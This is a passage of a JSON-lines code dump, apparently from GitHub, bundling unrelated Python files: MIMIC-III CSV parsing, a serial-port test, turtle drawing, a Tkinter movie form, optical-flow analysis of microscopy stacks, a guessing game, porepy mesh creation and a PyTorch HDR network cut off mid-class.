)\n","repo_name":"ivansantiagojr/fastapi_graphql","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41487465918","text":"import os\nfrom datetime import datetime\n\nimport pandas as pd\nimport numpy as np\n\n\ndef parse_admission(path) -> dict:\n print('parsing ADMISSIONS.csv ...')\n admission_path = os.path.join(path, 'ADMISSIONS.csv')\n admissions = pd.read_csv(\n admission_path,\n usecols=['SUBJECT_ID', 'HADM_ID', 'ADMITTIME'],\n converters={ 'SUBJECT_ID': np.int, 'HADM_ID': np.int, 'ADMITTIME': np.str }\n )\n all_patients = dict()\n for i, row in admissions.iterrows():\n if i % 100 == 0:\n print('\\r\\t%d in %d rows' % (i + 1, len(admissions)), end='')\n pid = row['SUBJECT_ID']\n admission_id = row['HADM_ID']\n admission_time = datetime.strptime(row['ADMITTIME'], '%Y-%m-%d %H:%M:%S')\n if pid not in all_patients:\n all_patients[pid] = []\n admission = all_patients[pid]\n admission.append({\n 'admission_id': admission_id,\n 'admission_time': admission_time\n })\n print('\\r\\t%d in %d rows' % (len(admissions), len(admissions)))\n\n patient_admission = dict()\n for pid, admissions in all_patients.items():\n if len(admissions) > 1:\n patient_admission[pid] = sorted(admissions, key=lambda admission: admission['admission_time'])\n\n return patient_admission\n\n\ndef parse_diagnoses(path, patient_admission: dict) -> dict:\n print('parsing DIAGNOSES_ICD.csv ...')\n diagnoses_path = os.path.join(path, 'DIAGNOSES_ICD.csv')\n diagnoses = pd.read_csv(\n diagnoses_path,\n usecols=['SUBJECT_ID', 'HADM_ID', 'ICD9_CODE'],\n converters={ 'SUBJECT_ID': np.int, 'HADM_ID': np.int, 'ICD9_CODE': np.str }\n )\n\n def to_standard_icd9(code: str):\n split_pos = 4 if code.startswith('E') else 3\n icd9_code = code[:split_pos] + '.' 
+ code[split_pos:] if len(code) > split_pos else code\n return icd9_code\n\n admission_codes = dict()\n for i, row in diagnoses.iterrows():\n if i % 100 == 0:\n print('\\r\\t%d in %d rows' % (i + 1, len(diagnoses)), end='')\n pid = row['SUBJECT_ID']\n if pid in patient_admission:\n admission_id = row['HADM_ID']\n code = row['ICD9_CODE']\n if code == '':\n continue\n code = to_standard_icd9(code)\n if admission_id not in admission_codes:\n codes = []\n admission_codes[admission_id] = codes\n else:\n codes = admission_codes[admission_id]\n codes.append(code)\n print('\\r\\t%d in %d rows' % (len(diagnoses), len(diagnoses)))\n\n return admission_codes\n\n\ndef parse_notes(path, patient_admission: dict, use_summary=False) -> dict:\n print('parsing NOTEEVENTS.csv ...')\n notes_path = os.path.join(path, 'NOTEEVENTS.csv')\n notes = pd.read_csv(\n notes_path,\n usecols=['HADM_ID', 'TEXT', 'CATEGORY'],\n converters={'HADM_ID': lambda x: np.int(x) if x != '' else -1, 'TEXT': np.str, 'CATEGORY': np.str}\n )\n patient_note = dict()\n for i, (pid, admissions) in enumerate(patient_admission.items()):\n print('\\r\\t%d in %d patients' % (i + 1, len(patient_admission)), end='')\n admission_id = admissions[-1]['admission_id']\n if use_summary:\n note = [row['TEXT'] for _, row in notes[notes['HADM_ID'] == admission_id].iterrows()\n if row['CATEGORY'] == 'Discharge summary']\n else:\n # note = notes[notes['HADM_ID'] == admission_id]['TEXT'].tolist()\n note = [row['TEXT'] for _, row in notes[notes['HADM_ID'] == admission_id].iterrows()\n if row['CATEGORY'] != 'Discharge summary']\n note = ' '.join(note)\n if len(note) > 0:\n patient_note[pid] = note\n print('\\r\\t%d in %d patients' % (len(patient_admission), len(patient_admission)))\n return patient_note\n\n\ndef calibrate_patient_by_admission(patient_admission: dict, admission_codes: dict):\n print('calibrating patients by admission ...')\n del_pids = []\n for pid, admissions in patient_admission.items():\n for admission in admissions:\n if admission['admission_id'] not in admission_codes:\n break\n else:\n continue\n del_pids.append(pid)\n for pid in del_pids:\n admissions = patient_admission[pid]\n for admission in admissions:\n if admission['admission_id'] in admission_codes:\n del admission_codes[admission['admission_id']]\n else:\n print('\\tpatient %d have an admission %d without diagnosis' % (pid, admission['admission_id']))\n del patient_admission[pid]\n\n\ndef calibrate_patient_by_notes(patient_admission: dict, admission_codes: dict, patient_note: dict):\n print('calibrating patients by notes ...')\n del_pids = [pid for pid in patient_admission if pid not in patient_note]\n for pid in del_pids:\n print('\\tpatient %d doesn\\'t have notes' % pid)\n admissions = patient_admission[pid]\n for admission in admissions:\n del admission_codes[admission['admission_id']]\n del patient_admission[pid]\n","repo_name":"LuChang-CS/CGL","sub_path":"preprocess/parse_csv.py","file_name":"parse_csv.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"15276409829","text":"import serial\n\n\nif __name__ == \"__main__\":\n port = serial.Serial()\n port.port = \"COM3\"\n port.baudrate = 115200\n port.open()\n while True:\n data = port.readline()\n print(data)\n if (\"There\" in data.decode(\"ascii\")):\n break\n data = bytes(\"Hello\\r\\n\", \"ascii\")\n port.write(data)\n 
port.close()\n","repo_name":"ObliviousReality/JacDeck","sub_path":"Serial.py","file_name":"Serial.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32296211919","text":"import turtle as c \nimport colorsys\nt.bgcolor(\"black\")\nt.tracer(100)\nt.pensize(1)\nh = 0.5\nfor i in range(250):\n c = colorsys.hsv_to_rgb(h,1,1)\n h = 0.0008\n t.fillcolor(c)\n t.begin_fill()\n t.fd(i)\n t.lt(100)\n t.circle(30)\n for j in range(2):\n t.fd(i*j)\n t.rt(109)\n t.end_fill()\n","repo_name":"sksalahuddin2828/Python","sub_path":"turtle_one.py","file_name":"turtle_one.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"78"} +{"seq_id":"26697684454","text":"from tkinter import *\nimport tkinter.ttk as ttk\nimport tkinter.font as tkFont\nimport tkinter.messagebox as tkMsgBox\nimport bll.pelis as peli\n\nclass Pelicula(Toplevel):\n def __init__(self, master=None, peli_id = None): \n super().__init__(master)\n self.master = master\n self.peli_id = peli_id \n self.title(\"Pelicula\")\n #setting window size\n width=383\n height=431\n screenwidth = self.winfo_screenwidth()\n screenheight = self.winfo_screenheight()\n alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)\n self.geometry(alignstr)\n self.resizable(width=False, height=False)\n\n GLabel_572=Label(self)\n ft = tkFont.Font(family='Times',size=10)\n GLabel_572[\"font\"] = ft\n GLabel_572[\"fg\"] = \"#999999\"\n GLabel_572[\"justify\"] = \"center\"\n GLabel_572[\"text\"] = \"Titulo\"\n GLabel_572.place(x=15,y=35,width=94,height=30)\n\n Gtit=Entry(self, name=\"txtTitulo\")\n Gtit[\"borderwidth\"] = \"1px\"\n ft = tkFont.Font(family='Times',size=10)\n Gtit[\"font\"] = ft\n Gtit[\"fg\"] = \"#333333\"\n Gtit[\"justify\"] = \"left\"\n Gtit[\"text\"] = \"\"\n Gtit.place(x=40,y=60,width=250,height=30)\n\n GLabel_102=Label(self)\n ft = tkFont.Font(family='Times',size=10)\n GLabel_102[\"font\"] = ft\n GLabel_102[\"fg\"] = \"#999999\"\n GLabel_102[\"justify\"] = \"center\"\n GLabel_102[\"text\"] = \"Descripcion\"\n GLabel_102.place(x=35,y=105,width=92,height=30)\n\n Gdesc= Entry(self, name=\"txtDescripcion\")\n Gdesc[\"borderwidth\"] = \"1px\"\n ft = tkFont.Font(family='Times',size=10)\n Gdesc[\"font\"] = ft\n Gdesc[\"fg\"] = \"#333333\"\n Gdesc[\"justify\"] = \"left\"\n Gdesc[\"text\"] = \"\"\n Gdesc.place(x=40,y=130,width=301,height=30)\n\n GLabel_464= Label(self)\n ft = tkFont.Font(family='Times',size=10)\n GLabel_464[\"font\"] = ft\n GLabel_464[\"fg\"] = \"#999999\"\n GLabel_464[\"justify\"] = \"center\"\n GLabel_464[\"text\"] = \"Genero\"\n GLabel_464.place(x=35,y=165,width=70,height=25)\n\n Ggen= Entry(self, name=\"txtGenero\")\n Ggen[\"borderwidth\"] = \"1px\"\n ft = tkFont.Font(family='Times',size=10)\n Ggen[\"font\"] = ft\n Ggen[\"fg\"] = \"#333333\"\n Ggen[\"justify\"] = \"left\"\n Ggen[\"text\"] = \"\"\n Ggen.place(x=40,y=190,width=172,height=30)\n\n GLabel_14= Label(self)\n ft = tkFont.Font(family='Times',size=10)\n GLabel_14[\"font\"] = ft\n GLabel_14[\"fg\"] = \"#999999\"\n GLabel_14[\"justify\"] = \"center\"\n GLabel_14[\"text\"] = \"Actores\"\n GLabel_14.place(x=35,y=220,width=70,height=20)\n\n Gact= Entry(self, name=\"txtActores\")\n Gact[\"borderwidth\"] = \"1px\"\n ft = tkFont.Font(family='Times',size=10)\n Gact[\"font\"] = ft\n Gact[\"fg\"] = \"#333333\"\n Gact[\"justify\"] = \"left\"\n Gact[\"text\"] = \"\"\n 
Gact.place(x=40,y=240,width=232,height=30)\n\n GLabel_656= Label(self)\n ft = tkFont.Font(family='Times',size=10)\n GLabel_656[\"font\"] = ft\n GLabel_656[\"fg\"] = \"#999999\"\n GLabel_656[\"justify\"] = \"center\"\n GLabel_656[\"text\"] = \"Duracion\"\n GLabel_656.place(x=35,y=275,width=70,height=25)\n\n Gdurac= Entry(self, name=\"txtDuracion\")\n Gdurac[\"borderwidth\"] = \"1px\"\n ft = tkFont.Font(family='Times',size=10)\n Gdurac[\"font\"] = ft\n Gdurac[\"fg\"] = \"#333333\"\n Gdurac[\"justify\"] = \"left\"\n Gdurac[\"text\"] = \"\"\n Gdurac.place(x=40,y=300,width=139,height=30)\n\n GButton_924= Button(self)\n GButton_924[\"bg\"] = \"#e9e9ed\"\n ft = tkFont.Font(family='Times',size=10)\n GButton_924[\"font\"] = ft\n GButton_924[\"fg\"] = \"#000000\"\n GButton_924[\"justify\"] = \"center\"\n GButton_924[\"text\"] = \"Aceptar\"\n GButton_924.place(x=140,y=360,width=70,height=25)\n GButton_924[\"command\"] = self.aceptar\n\n GButton_220= Button(self)\n GButton_220[\"bg\"] = \"#e9e9ed\"\n ft = tkFont.Font(family='Times',size=10)\n GButton_220[\"font\"] = ft\n GButton_220[\"fg\"] = \"#000000\"\n GButton_220[\"justify\"] = \"center\"\n GButton_220[\"text\"] = \"Cancelar\"\n GButton_220.place(x=240,y=360,width=70,height=25)\n GButton_220[\"command\"] = self.cancelar\n\n #si peli_id se pasa como parametro \n if peli_id is not None:\n pelicula = peli.obtener_id(peli_id)\n \n if pelicula is None:\n tkMsgBox.showerror(self.master.title(), \"Se produjo un error al obtener los datos del usuario, reintente nuevamente\")\n self.destroy()\n else:\n Gtit.insert(0, pelicula[0])\n Gdesc.insert(0, pelicula[1])\n Ggen.insert(0, pelicula[2])\n Gact.insert(0, pelicula[3])\n Gdurac.insert(0, pelicula[4]) \n\n def get_value(self, name):\n return self.nametowidget(name).get()\n\n def get_index(self, name):\n return self.nametowidget(name).current() + 1\n\n def cancelar(self):\n self.destroy()\n\n def aceptar(self):\n try: \n titulo = self.get_value(\"txtTitulo\")\n descripcion = self.get_value(\"txtDescripcion\") \n genero = self.get_value(\"txtGenero\") \n actores = self.get_value(\"txtActores\")\n duracion = self.get_value(\"txtDuracion\") \n \n # TODO validar los datos antes de ingresar\n if titulo == \"\" or descripcion == \"\" or genero == \"\" or actores == \"\" or duracion == \"\":\n tkMsgBox.showerror(self.master.title(), \"todos los campos deben estar completos.\")\n return\n\n if self.peli_id is None:\n print(\"Alta de pelicula\")\n if not peli.existe(titulo):\n peli.agregar(titulo, descripcion, genero, actores, duracion)\n tkMsgBox.showinfo(self.master.title(), \"Registro agregado!!!!!!\") \n try:\n self.master.refrescar()\n except Exception as ex:\n print(ex)\n self.destroy() \n else:\n tkMsgBox.showwarning(self.master.title(), \"Pelicula existente en nuestros registros\")\n else:\n print(\"Actualizacion de pelicula\")\n peli.actualizar(self.peli_id, titulo, descripcion, genero, actores, duracion)\n tkMsgBox.showinfo(self.master.title(), \"Registro modificado!!!!!!\") \n self.master.refrescar()\n self.destroy() \n\n except Exception as ex:\n tkMsgBox.showerror(self.master.title(), str(ex))","repo_name":"ramondom/proyecto-f","sub_path":"frmpeli.py","file_name":"frmpeli.py","file_ext":"py","file_size_in_byte":6903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5880680985","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# coding = UTF-8\n#Derive from \"tcp_echo_server_0101bOK\"\n\n\"\"\"\nA simple \"tcp echo server\" for demonstrating 
TCP usage.\nThe server listens for TCP packets and echoes any received\npackets back to the originating host.\n\n\"\"\"\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import style\nimport numpy as np\n\nclass DI:\n def __init__(self, Lines = [1850826, 1846028, 1858695, 1846032, 1851374, 1844861, 1854828, 1855687], Path = \"./Data.csv\"):\n self.Lines = Lines\n self.Path = Path\n self.X = 0\n self.Fig = plt.figure()\n self.Ax = self.Fig.add_subplot(1,1,1)\n\n def Animate(self):\n xs1 = []\n ys1 = []\n for line in self.Lines:\n self.X += 1\n y = line\n xs1.append(int(self.X))\n ys1.append(int(y))\n self.xs1 = xs1\n self.ys1 = ys1\n self.Ax.clear()\n self.Ax.plot(xs1,ys1,linewidth=1)\n\n def Show(self):\n ani = animation.FuncAnimation(self.Fig, self.Animate(),interval=1)\n plt.show()\n\nDI = DI()\nDI.Show()\n","repo_name":"GemYamTechnology/CoherentBR","sub_path":"Python/C_2d_plot0.py","file_name":"C_2d_plot0.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"41531024965","text":"import os, os.path\nimport argparse\nfrom datetime import datetime\nimport numpy as np\nimport cv2 as cv\nfrom scipy.ndimage import gaussian_filter, gaussian_filter1d\nimport read_lif as lif\nimport check\nimport json\nimport h5py\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Perform 2D optical flow between planes of successive stacks of a LIF serie')\n parser.add_argument('filename', type= str, help = 'path and name of the LIF file')\n parser.add_argument('-s','--series', type=int, help='The first series to analyse. (the only one if endseries is None.)')\n parser.add_argument('--endseries', type=int, help='The last series to analyse (if a time aquitision was split in more than one series).')\n parser.add_argument('-o','--output',default='flow', type=str, help = 'output path and prefix')\n parser.add_argument('--preblur',type=float, default=1., help='Amount of gaussian preblur in XY')\n parser.add_argument('--Zpreblur',type=float, default=0., help='Amount of gaussian preblur in Z')\n parser.add_argument('--pyrsteps',type=int, default=4, help='Number of steps in the pyramid used by Farneback optical flow algorithm')\n parser.add_argument('--square_farneback',type=bool, default=False, help='Optical flow algorithm uses square filtering instead of isotropic Gaussian. Causes anisotropy problem but is marginally faster.')\n parser.add_argument('--binning',type=int, default=8, help='Binning of the output flow field in X and Y. 
Chose a power of 2.')\n parser.add_argument('--no_clean_git',type=bool, default=False, help='Bypass checking wether my git repository is clean (Use only for tests).')\n\n args = parser.parse_args()\n\n args.filename = os.path.abspath(args.filename)\n if not args.no_clean_git:\n args.commit = check.clean_git(__file__).hexsha\n args.datetime = datetime.now().isoformat()\n rea = lif.Reader(args.filename, False)\n if not hasattr(args, 'series') or args.series is None:\n args.series = rea.chooseSerieIndex()\n if not hasattr(args, 'endseries') or args.endseries is None:\n args.endseries = args.series\n\n sers = rea.getSeries()[args.series:args.endseries+1]\n nbFrames = sum(ser.getNbFrames() for ser in sers)\n ser = sers[0]\n\n flags = 0\n if not args.square_farneback:\n flags &= cv.OPTFLOW_FARNEBACK_GAUSSIAN\n\n #prepare output\n with h5py.File(args.output+\".h5\", \"a\") as h5file:\n #prepare the output array on disk\n flow = h5file.require_dataset(\n \"FlowField3D\",\n (nbFrames-1, ser.getFrameShape()[0], ser.getFrameShape()[1]//args.binning, ser.getFrameShape()[2]//args.binning, 3),\n dtype='float32')\n #prepare timestamps array on disk\n timestamps = h5file.require_dataset(\n \"timestamps\",\n (nbFrames, ser.getFrameShape()[0]),\n dtype=float\n )\n #save all analysis parameters\n for k,v in args.__dict__.items():\n flow.attrs[k] = v\n #make a list with the binning value to be multiplied with the opticalflow value to obtain obsolute values in pixel\n bins = h5file.require_dataset(\n \"binning_size_in_pixels\",\n data= np.array([args.binning, args.binning,1]),\n shape=(3,), dtype=np.int32)\n binning_shape = (flow.shape[1], flow.shape[2], args.binning, flow.shape[3], args.binning)\n #allocate memory\n flowxy = np.zeros(ser.getFrameShape()+[2])\n flowxz = np.zeros_like(flowxy)\n flowyz = np.zeros_like(flowxy)\n weights = np.zeros(ser.getFrameShape()+[3])\n #perform actual computation\n ti = 0\n for ser in sers:\n print(\"\\n%s\"%(ser.getName()))\n #save timestamps\n ts = ser.getTimeStamps()\n nts = len(ts)//ser.getFrameShape()[0]\n timestamps[ti:ti+nts] = ts[:nts*ser.getFrameShape()[0]].reshape((nts, ser.getFrameShape()[0]))\n for t, fr in ser.enumByFrame():\n #blur only in XY since PSF is already elongated in Z.\n f1 = gaussian_filter(fr.astype(float), [args.Zpreblur,args.preblur,args.preblur])\n #normalize by intensity profile along z. 
Absolutely crucial, otherwise Farneback algorithm discards low intensity pixels\n intensity_profile = f1.max((1,2))\n intensity_profile[intensity_profile==0] = 1\n f1 = (f1*(255/intensity_profile)[:,None,None]).astype(np.uint8)\n if t+ti > 0:\n weights[:] = np.finfo(weights.dtype).eps\n #unfortunately, cv.alcOpticalFlowFarneback does not work directly in 3D\n #Optical flow in each XY plane give dX and dY, but no information on dZ\n for i, (im0, im1) in enumerate(zip(f0, f1)):\n flowxy[i] = cv.calcOpticalFlowFarneback(\n im0, im1,\n None, 0.5, args.pyrsteps, 15, 3, 5, 1.2, flags=flags\n )\n #estimate the confidence of each pixel using a Shi-Tomasi criterion\n weights[i,...,0] = cv.cornerMinEigenVal(im0,3)\n #unshear f1 along X only (here we suppose dY small)\n zprofile = (flowxy*weights[...,0,None]).sum((1,2)) / weights[...,0,None].sum((1,2))\n izprofile = zprofile.astype(int)\n maxshift = izprofile.max(0)\n minshift = izprofile.min(0)\n ptpshift = maxshift - minshift\n shifted = np.zeros((f1.shape[0], f1.shape[1], f1.shape[2]-ptpshift[0]), np.uint8)\n for z, im in enumerate(f1):\n shift = izprofile[z,0]-minshift[0]\n shifted[z] = im[...,shift:shifted.shape[-1]+shift]\n #shifted[z] = np.pad(im, pad_width=((0,0), (ptpshift[0]-shift[0],shift[0])), mode='constant')\n #Optical flow in each XZ where a correspondance is possible between the two times.\n mshift = max(0, minshift[0])\n sl = slice(mshift, shifted.shape[2]+mshift)\n for i in range(f0.shape[1]):\n fl = cv.calcOpticalFlowFarneback(\n f0[:,i, sl],\n shifted[:,i,:],\n None, 0.5, args.pyrsteps, 15, 3, 5, 1.2, flags=flags\n )\n #Outside of the conrresponding range, results correspond to XY results\n flowxz[:,i,:] = fl.mean(axis=(0,1))\n #inside the range, use the calculated values\n flowxz[:,i,sl] = fl\n #estimate the confidence of each pixel using a Shi-Tomasi criterion\n weights[:,i,sl,1] = cv.cornerMinEigenVal(f0[:,i,sl],3)\n #Slicing perpendicular to Y creates independent values and thus noise along Y. Blur along that direction\n gaussian_filter1d(flowxz, 4, axis=1, output=flowxz)\n #add back the integer part of the X displacement\n flowxz[...,0] += np.trunc(zprofile[:,None,None,0])\n\n #Optical flow in each YZ where a correspondance is possible between the two times.\n for i in range(shifted.shape[2]):\n fl = cv.calcOpticalFlowFarneback(\n f0[:,:,i+mshift],\n shifted[:,:,i],\n None, 0.5, args.pyrsteps, 15, 3, 5, 1.2, flags=flags\n )\n flowyz[...,i+mshift,:] = fl\n #estimate the confidence of each pixel using a Shi-Tomasi criterion\n weights[...,i+mshift,2] = cv.cornerMinEigenVal(f0[:,:,i+mshift],3)\n #pad YZ results along X to correspond to the shape of XY results shape\n mflowyz = flowyz[:,:,sl].mean(2)[:,:,None]\n flowyz[:,:,:mshift] = mflowyz\n flowyz[:,:,shifted.shape[2]+mshift:] = mflowyz\n #Slicing perpendicular to X creates independent values and thus noise along X. Blur along that direction\n gaussian_filter1d(flowyz, 4, axis=2, output=flowxz)\n #add a small constant weight to prevent division by zero\n #weights += 1e-7\n #weighted binning in XY and saving. 
Here we suppose opicalflow in XY is the ground truth\n flow[t+ti-1,...,:2] = (flowxy*weights[...,0,None]).reshape(binning_shape+(2,)).sum(axis=(2,4)) / weights[...,0].reshape(binning_shape).sum(axis=(2,4))[...,None]\n #take the average of the two measurements of dZ, weighted by confidence\n flow[t+ti-1,...,2] = ((flowxz[...,1]*weights[...,1] + flowyz[...,1]*weights[...,2])).reshape(binning_shape).sum(axis=(2,4)) / ((weights[...,1]+weights[...,2])).reshape(binning_shape).sum(axis=(2,4))\n f0 = np.copy(f1)\n print('\\r%d (%.01f %%)'%(t, 100*(t+ti+1)/flow.shape[0]), sep=' ', end=' ', flush=True)\n ti += ser.getNbFrames()\n print(\"\\ndone!\")\n","repo_name":"KehoAll/StageM2","sub_path":"gelrupture/opticalflow.py","file_name":"opticalflow.py","file_ext":"py","file_size_in_byte":9293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2425236038","text":"import random\nimport time\n\nclass Game():\n def __init__(self):\n self.start = 1\n self.end = 10\n self.guess_limit = 5\n self.guess_ct = 0\n self.won = False\n self.target = None\n self.total_games = 0\n self.win_count = 0\n self.best_win = float('inf')\n self.feature_map = {\n 'G': self.modify_guess_limit,\n 'R': self.modify_range,\n 'D': self.reset,\n 'C': self.play_game\n }\n self.main_screen()\n\n def main_screen(self):\n change_request = None\n while change_request != 'C':\n print()\n change_request = input(\"Please press the key representing any of the following settings that you would like to change: Guess limit (G), Guess range (R), Reset all features to defaults (D), or Continue (C): \")\n self.feature_map[change_request]()\n\n def reset(self):\n self.start = 1\n self.end = 10\n self.guess_limit = 5\n self.win_count = 0\n self.best_win = float('inf')\n \n def modify_range(self):\n # provide user with more info and opportunity to back out\n print()\n print(\"This feature allows you to modify the range of values that the secret number can be between.\")\n validate = input(\"Please press 'D' if you would like to reset the range to its default or 'E' if you would like to exit and keep the current setting as is; otherwise, please press any other key to continue: \")\n if validate == 'D':\n self.start = 1\n self.end = 10\n return\n elif validate == 'E':\n return\n # prompt the user to specify a number range\n self.start = int(input(\"Please enter the start of the range. (For example, if you wanted the range of valid numbers to be between 10 and 30, you would enter '10'): \"))\n self.end = int(input(\"Please enter the end of the range. 
(For example, if you wanted the range of valid numbers to be between 10 and 30, you would enter '30'): \"))\n\n def generate_target(self):\n with open(\"num-service.txt\", \"w\") as file:\n file.write(f\"{self.start},{self.end}\")\n num_generated = False\n while True:\n time.sleep(1.0)\n with open(\"num-service.txt\", \"r\") as f:\n line = f.readline().strip()\n if not line:\n continue\n if line.isnumeric():\n num_generated = True\n self.target = int(line)\n break\n\n def modify_guess_limit(self):\n print()\n print(\"This feature allows you to modify the number of attempts you have to guess the secret number.\")\n validate = input(\"Please press 'D' if you would like to reset the guess limit to its default or 'E' if you would like to exit and keep the current setting as is; otherwise, please press any other key to continue: \")\n if validate == 'D':\n self.guess_limit = 5\n return\n elif validate == 'E':\n return\n # prompt the user to specify guess limit\n print(\"\")\n self.guess_limit = int(input(\"Great! What is the maximum number of guesses you’d like to specify? Please enter a numerical value. (For example, if you wanted to have up to 5 guesses before the game ends, you would enter '5'): \"))\n\n def end_game(self):\n self.total_games += 1\n # if game won, print won\n if self.won:\n self.win_count += 1\n self.best_win = min(self.best_win, self.guess_ct)\n print()\n print(f\"Congrats! You won the game in {self.guess_ct} guesses!\")\n print(f\"You've won a total of {self.win_count} out of {self.total_games} games, with the quickest win being in {self.best_win} guesses.\")\n # if game not won after reaching guess limit, print loss\n else:\n print()\n print(f\"Sorry, you've ran out of guesses.\")\n print(f\"You've won a total of {self.win_count} out of {self.total_games} games, with the quickest win being in {self.best_win} guesses.\")\n # prompt user to play another game\n open('num-service.txt', 'w').close()\n play_again = input(\"Would you like to play again? (Y/N): \")\n if play_again == 'Y':\n self.won = False\n self.guess_ct = 0\n self.play_game()\n\n def play_game(self):\n print()\n # validate user is ready to play game\n confirmation = input(\"Are you ready to start the game? (Y/N): \")\n if confirmation == 'N':\n self.main_screen()\n return\n self.generate_target()\n # generate a random number between number range\n while self.guess_ct < self.guess_limit and not self.won:\n # prompt user for guess and based on guess, provide\n guess = int(input(\"Guess the number: \"))\n self.guess_ct += 1\n if guess == self.target:\n print(\"Correct! You guessed the number.\")\n self.won = True\n break\n elif guess < self.target:\n # update guess ct and provide feedback\n print(f\"Too low! Try again. You have {self.guess_limit - self.guess_ct} guesses remaining.\")\n elif guess > self.target:\n print(f\"Too high! Try again. 
You have {self.guess_limit - self.guess_ct} guesses remaining.\")\n self.end_game()\n\ndef main():\n game = Game()\n\nif __name__ == \"__main__\":\n main()","repo_name":"mjung1/361_Project","sub_path":"higher_lower.py","file_name":"higher_lower.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32331827518","text":"import numpy as np\nimport porepy as pp\n\n\ndef create_gb(mesh_args: dict, dim: int = 2, fractured: bool = False):\n \"\"\"\n Create the grid for the computations:\n - An unstructured 2D grid, without fractures, or with five fractures\n - A 3D grid, either without fractures or with two that intersect at a line\n\n Parameters:\n mesh_args (dict): contains mesh arguments for the (unstrucured) grid\n dim: int: highest dimension of grid\n fractured (boolean, optional): Whether fractures are present.\n Default is False\n\n \"\"\"\n\n if not mesh_args:\n raise ValueError(\"Mesh parameters must be given\")\n\n if dim == 2:\n\n if fractured:\n pts = np.array(\n [\n [0.6, 0.2], # End pts\n [0.2, 0.8], # Statring pts\n [0.6, 0.6],\n [0.2, 0.5],\n [1.2, 0.6],\n [0.9, 0.8],\n [1.7, 0.3],\n [1.0, 0.2],\n ]\n ).T\n\n e = np.array([[0, 1], [2, 3], [4, 5], [6, 7]]).T\n\n else:\n pts, e = None, None\n # end if-else\n\n domain = {\"xmin\": 0.0, \"xmax\": 2, \"ymin\": 0.0, \"ymax\": 1}\n\n network_2d = pp.FractureNetwork2d(pts, e, domain)\n gb = network_2d.mesh(mesh_args)\n # end if-else\n\n elif dim == 3:\n\n domain = {\"xmin\": 0, \"xmax\": 1, \"ymin\": 0, \"ymax\": 1, \"zmin\": 0, \"zmax\": 1}\n\n if fractured:\n f1 = pp.Fracture(\n np.array(\n [\n [0.25, 0.75, 0.25, 0.75],\n [0.30, 0.30, 0.70, 0.70],\n [0.30, 0.30, 0.70, 0.70],\n ]\n )\n )\n f2 = pp.Fracture(\n np.array(\n [\n [0.25, 0.75, 0.25, 0.75],\n [0.30, 0.30, 0.70, 0.70],\n [0.70, 0.70, 0.30, 0.30],\n ]\n )\n )\n frac_list = [f1, f2]\n else:\n frac_list = []\n # end if-else\n network_3d = pp.FractureNetwork3d(frac_list, domain=domain)\n gb = network_3d.mesh(mesh_args)\n else:\n raise ValueError(\"Only 2- or 3D grids\")\n # end if-else\n\n return gb\n","repo_name":"taj004/Fully_coupled_THC","sub_path":"code/create_mesh.py","file_name":"create_mesh.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"8932034066","text":"import os\nimport numpy as np\nimport torch.nn.functional as F\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n#from s2cnn import SO3Convolution\n#from s2cnn import S2Convolution\n#from s2cnn import so3_integrate\n#from s2cnn import so3_near_identity_grid\n#from s2cnn import s2_near_identity_grid\nimport numpy as np\nfrom utils import *\nfrom dequntization_net import Dequantization_net\nfrom linearization_net import Linearization_net\nfrom hallucination_net import Hallucination_net\nimport matplotlib.pyplot as plt\n\n\n\nclass Net(nn.Module):\n def __init__(self, args):\n super(Net, self).__init__()\n self.HDR_net = HDR_net(args)\n \n self.args = args\n \n# self.register_buffer(\"integral\", torch.zeros((args.batch_size,), requires_grad=False))\n# self.register_buffer(\"dphi\", torch.tensor([2*np.pi/args.width], requires_grad=False))\n# self.register_buffer(\"dtheta\", torch.tensor([np.pi/args.height], requires_grad=False))\n self.dphi = 2 * np.pi/args.width\n self.dtheta = np.pi/args.height\n \n phi = torch.zeros((self.args.height//2, self.args.width))\n theta = 
torch.zeros((self.args.height//2, self.args.width))\n \n for y in range(self.args.height//2):\n for x in range(self.args.width):\n phi[y,x] = (x / args.width) * 2 * np.pi\n theta[y,x] = (y / args.height) * np.pi\n self.register_buffer(\"phi\", phi.unsqueeze(0).repeat(args.batch_size//torch.cuda.device_count(),1,1))\n self.register_buffer(\"theta\", theta.unsqueeze(0).repeat(args.batch_size//torch.cuda.device_count(),1,1))\n \n def forward(self, ldr, exposure):\n _,_,hdr = self.HDR_net(ldr, exposure)\n img = 179 * (hdr[:,0,:,:] * 0.2126 + hdr[:,1,:,:] * 0.7152 + hdr[:,2,:,:] * 0.0722)\n# self.integral = torch.zeros((self.args.batch_size,), requires_grad=False).cuda()\n \n output = img[:,0:self.args.height//2,:].mul(torch.sin(self.theta)).mul(torch.cos(self.theta)) * self.dphi * self.dtheta\n# for y in range(self.args.height//2):\n# for x in range(self.args.width):\n# phi = (x / self.args.width) * 2 * np.pi\n# theta = (y / self.args.height) * np.pi\n# self.integral += img[:,y,x] * np.sin(theta) * np.cos(theta) * self.dphi * self.dtheta\n return hdr, output.sum([1,2]) / 1000.0\n\n\nclass Integral(nn.Module):\n def __init__(self, args):\n super(Integral, self).__init__()\n self.args = args\n\n 